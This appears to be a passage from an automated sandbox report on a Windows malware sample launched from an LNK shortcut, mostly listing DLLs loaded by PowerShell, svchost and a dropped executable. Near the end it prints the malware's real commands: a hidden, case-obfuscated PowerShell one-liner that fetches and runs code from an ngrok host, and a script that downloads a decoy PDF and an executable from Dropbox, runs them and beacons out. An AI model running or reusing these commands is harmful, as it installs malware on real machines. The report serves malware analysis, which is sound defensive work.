                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: k7rn7l32.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: ntd3ll.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: xWpAZpLw47.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: softy.pdb source: powershell.exe, 00000013.00000002.2595787903.0000020128EE8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\Jenkins\workspace\ccd-app\main\native\win32\build\msvs_win32_x86\Release\x86\sym\AdobeUpdateService\AdobeUpdateService\AdobeUpdateService.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000000.2494880507.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000000.2654743905.000000000049E000.00000002.00000001.01000000.0000000F.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000013.00000002.2598990333.000002092A3BF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000013.00000002.2592766687.0000020128E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2589734635.0000020128C11000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673659739.0000000005000000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673539742.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679053609.0000000005660000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679182345.0000000005780000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673969723.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679900766.0000000005880000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2670468533.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672010118.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677991112.0000000005850000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677714771.0000000005660000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000013.00000002.2592766687.0000020128E30000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672985656.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673228387.0000000005080000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678687711.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678434932.0000000005660000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2670468533.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672010118.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677991112.0000000005850000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677714771.0000000005660000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672985656.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673228387.0000000005080000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678687711.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678434932.0000000005660000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673659739.0000000005000000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673539742.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679053609.0000000005660000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679182345.0000000005780000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673969723.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679900766.0000000005880000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      PowerShell case anomaly found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)Jump to behavior
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)Jump to behavior
